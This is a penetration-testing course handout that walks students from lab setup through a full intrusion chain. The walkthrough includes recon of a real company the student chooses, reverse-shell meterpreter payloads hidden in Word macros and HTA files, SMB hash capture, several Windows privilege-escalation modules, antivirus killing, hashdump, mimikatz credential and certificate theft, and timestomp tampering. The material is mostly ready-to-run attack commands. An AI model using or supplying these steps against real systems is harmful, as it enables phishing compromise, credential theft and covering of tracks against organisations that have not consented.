############################### Hacking Crash Course Day 1 # # Luke Ager

1. ##############################
2. # Hacking Crash Course Day 1 #
3. # Luke Ager #
4. ##############################
5.  
6.  
7.  
8. ###############
9. # Virtual BOX #
10. ###############
11.  
12. - Although you can get the machines working in VMware workstation or fusion, i’ll be supporting VirtualBox for this course. You can use other products if you are happy with the correct usage.
13.  
14. https://www.virtualbox.org/wiki/Downloads
15.  
16.  
17. #####################################
18. # Download the attack iso from Kali #
19. #####################################
20. https://www.kali.org/downloads/
21. Install (do not boot live)
22.  
23.  
24. ###########################
25. # Download the victim VM# #
26. ###########################
27. https://drive.google.com/open?id=0BzsF4HrNTtXzemt6R1gybVZRczQ
28. pass: Password1
29.  
30.  
31. ########################################
32. # Boot up the VM’s #
33. # #
34. ########################################
35.  
36. Before you boot, check network adapters are bridged and check all guests are in same network and can ping each other.
37.  
38. Log into your Kali box with the credentials you set during the install.
39.  
40.  
41. ###########################
42. # Finally getting started #
43. ###########################
44.  
45.  
46. /msfupdate
47.  
48. /msfconsole
49.  
50.  
51. ##############################################
52. # Run any Linux command inside of MSFConsole #
53. ##############################################
54. ls
55.  
56. pwd
57.  
58. ping -c1 yahoo.com
59.  
60. nmap yahoo.com
61.  
62. ###############
63. # Note taking #
64. ###############
65.  
66. Keep note
67.  
68. #############################################################
69. # Congratulations you are now a pentester, now get to work! #
70. #############################################################
71. You are a pentester for ACME corp and have been assigned to a new customer to conduct a red teaming test. You must gain access using the rules of engagement agreed with the customer.
72. For this engagement, the customer has restricted the use of physical contact. The test must be limited to remote attacks only. No on premise social engineering.
73.  
74. The customer is… (find one)
75. (note - aim for a SME or enterprise organisation - you must not attack offensively and you accept any responsibility for your actions.
76.  
77. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
78. ########################################
79. # RECON #
80. ########################################
81. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
82.  
83. - Let's start with a some simple recon with DNS
84. Understand the attack surface, find a way in. Easy but very effective
85.  
86.  
87. fierce -dns target.com
88. dnsmap target.com
89.  
90. look for remote worker access, vpn, citrix, outlook web access.
91.  
92.  
93. -------------------------------
94. - Now you have DNS names, you can probe them deeper with port scans to look for misconfigured ports or weaknesses. This usually gives results for the smaller companies. Doesn’t usually give much on the bigger ones. In honesty, I do not usually port scan the perimeter but there is certainly value in doing this. Personally, I attack users for credentials and then gain access the easy way.
95.  
96.  
97. ########################################
98. # NMAP Example #
99. ########################################
100.  
101. nmap target.com -A
102.  
103. (do full port scan, banner grab, OS fingerprint, this is loud but on the external perimeter, not such a big issue)
104.  
105. can also scan with metasploit if you prefer. Use auxiliary scanner.
106.  
107.  
108. ########################################
109. # Record all your findings in Keepnote #
110. ########################################
111.  
112. Now we have an understanding of the perimeter, lets look for targets. People are always the way in!
113.  
114. Old school is still the best:
115.  
116. theharvester -d target.com -b all -f target
117.  
118. now we have some employees and their email addresses. Lets go hunting for the right target!
119.  
120. My personal fav is LinkedInt however there is currently a bug. Worth checking on.
121.  
122. ####################################
123. # Use Maltego to resource targets. #
124. ####################################
125. Maltego is not always the answer but it does help with SE recon. Find a target and understand more about them before moving into weaponisation.
126.  
127. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
128. ########################################
129. # WEAPONISATION #
130. ########################################
131. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
132.  
133.  
134. ##################################
135. # Basic Client-Side Exploitation #
136. ##################################
137.  
138. git clone https://github.com/Veil-Framework/Veil-Evasion
139. cd Veil-Evasion/
140. cd setup
141. setup.sh -c
142.  
143. Veil-Evasion.py -p powershell/meterpreter/rev_https -c LHOST=192.168.1.13 LPORT=443 PROXY=Y —overwrite
144.  
145. copy payload path.
146.  
147. python macro_safe.py %PATH FROM ABOVE% %Filename%
148.  
149. copy output into MSoffice word macro.
150.  
151. Set Macro object to AutoOpen() as detailed here http://wordmvp/FAQs/MacrosVBA/DocumentEvents.htm
152.  
153.  
154.  
155. ##################################
156. # Metasploit server #
157. ##################################
158.  
159. use exploit/multi/handler
160. set payload windows/meterpreter/reverse_https
161. set lhost 192.168.1.13
162. set lport 443
163. set exitonsession false
164. exploit -j
165.  
166.  
167. (if you have speakers on kali -
168. back
169. load sounds
170. )
171.  
172.  
173. ####################################################
174. # What if Macros don’t work? ….The Fireeye effect. #
175. ####################################################
176.  
177. Sometimes, tier 1/2 clients will have sandboxing solutions, so sometimes we need to get creative. Use windows features such as UNC/SMB and poor egress filtering, grab hashes. If that doesn’t work try HTA files.
178.  
179.  
180. git clone https://github.com/vysec/genHTA
181.  
182.  
183. cd genHTA
184. python genHTA.py
185.  
186. complete questions
187. ls - should show output.hta
188.  
189. run:
190. msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.1.13 LPORT=443 -f hta-psh
191.  
192. copy output and paste into the below:
193.  
194. vim output.hta
195.  
196. edit where ‘ character begins in Modifyme() function.
197.  
198. mv output.hta /var/www/html
199.  
200. service apache2 start
201.  
202. browse to IP/output.hta from windows victim, download and run file using IE.
203.  
204. ####################################################
205. # When all else fails or you just want to double up #
206. ####################################################
207.  
208. Add quick part SMB to your office doc.
209.  
210. Insert quick part,
211. field,
212. includepicture
213. add. file://IP/file
214. data not stored within document
215.  
216. listen for hash using metasploit or responder.
217.  
218. use auxiliary/server/capture/smb
219. show options
220. run
221.  
222. or
223.  
224. responder
225.  
226. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
227. ########################################
228. # DELIVERY #
229. ########################################
230. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
231.  
232. Get creative
233.  
234.  
235. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
236. ########################################
237. # Exploitation #
238. ########################################
239. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
240.  
241. Technically we aren’t exploiting but depending on exploits available during your test you may use 0 days or exploits. When they aren’t available due to patching then social engineering is needed. 99% of my work is reliant on SE, user mistakes, not exploitation.
242.  
243.  
244. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
245. ########################################
246. # COMMAND & CONTROL #
247. ########################################
248. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
249.  
250. get shell. Simples
251.  
252.  
253. ###########################
254. # Client-Side Enumeration #
255. ###########################
256.  
257.  
258. - You can list the active sessions by typing:
259.  
260. sessions -l
261.  
262.  
263. - You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
264.  
265.  
266. sessions -i 1
267.  
268.  
269. - You should now see Metasploit's meterpreter prompt.
270.  
271.  
272. ********************************** Figure out who and where you are **********************************
273.  
274. meterpreter> sysinfo
275.  
276.  
277. meterpreter> getuid
278.  
279.  
280. meterpreter> ipconfig
281.  
282.  
283. meterpreter> run post/windows/gather/checkvm
284.  
285.  
286. meterpreter> run get_local_subnets
287.  
288.  
289.  
290. ********************************** Escalate privileges and get hashes **********************************
291.  
292. most of the below won’t work on up to date machines… my preference is option 4. Older machines will have more success if patch level is out of date.
293. meterpreter> use priv
294.  
295.  
296. --Option 1: GetSystem
297. meterpreter> getsystem
298.  
299. --Option 2:
300. meterpreter > run post/windows/escalate/getsystem
301.  
302. --Option 3:
303. meterpreter> background
304. back
305. use post/windows/escalate/droplnk
306. set SESSION 1
307. set PAYLOAD windows/meterpreter/reverse_tcp
308. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
309. set LPORT 1234
310. exploit
311.  
312. --Option 4:
313. use exploit/windows/local/bypassuac
314. set SESSION 1
315. set PAYLOAD windows/meterpreter/reverse_tcp
316. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
317. set LPORT 12345
318. exploit
319.  
320. --Option 5:
321. use exploit/windows/local/service_permissions
322. set SESSION 1
323. set PAYLOAD windows/meterpreter/reverse_tcp
324. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
325. set LPORT 5555
326. exploit
327.  
328. --Option 6:
329. use exploit/windows/local/trusted_service_path
330. set SESSION 1
331. set PAYLOAD windows/meterpreter/reverse_tcp
332. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
333. set LPORT 4567
334. exploit
335.  
336.  
337. --Option 7:
338. use exploit/windows/local/ppr_flatten_rec
339. set SESSION 1
340. set PAYLOAD windows/meterpreter/reverse_tcp
341. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
342. set LPORT 7777
343. exploit
344.  
345. --Option 8:
346. use exploit/windows/local/ms_ndproxy
347. set SESSION 1
348. set PAYLOAD windows/meterpreter/reverse_tcp
349. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
350. set LPORT 7788
351. exploit
352.  
353.  
354. --Option 9:
355. use exploit/windows/local/ask
356. set SESSION 1
357. set PAYLOAD windows/meterpreter/reverse_tcp
358. set LHOST 192.168.230.134 (Make sure you change this to your ip address)
359. set LPORT 7799
360. exploit
361.  
362.  
363. meterpreter > getuid
364. Server username: win7-64-victim\Workshop
365. meterpreter > getsystem
366. ...got system (via technique 1).
367. meterpreter > getuid
368. Server username: NT AUTHORITY\SYSTEM
369.  
370. --------------------------------------------------------
371.  
372. meterpreter> run killav
373.  
374. meterpreter> run post/windows/gather/hashdump
375.  
376. meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
377.  
378. meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
379.  
380. meterpreter> run post/windows/gather/credentials/credential_collector
381.  
382.  
383.  
384. ************ Stealing credentials and certificates ************
385. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
386.  
387. meterpreter > getsystem
388.  
389. meterpreter > load mimikatz
390.  
391. meterpreter > kerberos
392.  
393. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
394.  
395. meterpreter > msv <-- Your AD password
396.  
397. meterpreter > livessp <-- Your Windows8 password
398.  
399. meterpreter > ssp <-- Your outlook password
400.  
401. meterpreter > tspkg <-- Your AD password
402.  
403. meterpreter > wdigest <-- Your AD password
404.  
405. meterpreter > mimikatz_command -f crypto::listStores
406.  
407. meterpreter > mimikatz_command -f crypto::listCertificates
408.  
409. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
410.  
411. meterpreter > mimikatz_command -f crypto::patchcapi
412.  
413. meterpreter> search -d <directory> -f <file-pattern>
414.  
415.  
416. ********************************** Enumerate the host you are on **********************************
417.  
418. meterpreter > run getcountermeasure
419.  
420. meterpreter > run post/windows/gather/enum_applications
421.  
422. meterpreter > run post/windows/gather/enum_logged_on_users
423.  
424. meterpreter > run post/windows/gather/usb_history
425.  
426. meterpreter > run post/windows/gather/enum_shares
427.  
428. meterpreter > run post/windows/gather/enum_snmp
429.  
430. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
431.  
432.  
433. ********************************** Prove access **********************************
434.  
435. meterpreter> upload /home/proof.txt c:\\
436.  
437. meterpreter > timestomp C:\\proof.txt -v
438.  
439. meterpreter > timestomp C:\\proof.txt -m "12/12/2014 12:12:14"
440.  
441. meterpreter > timestomp C:\\proof.txt -v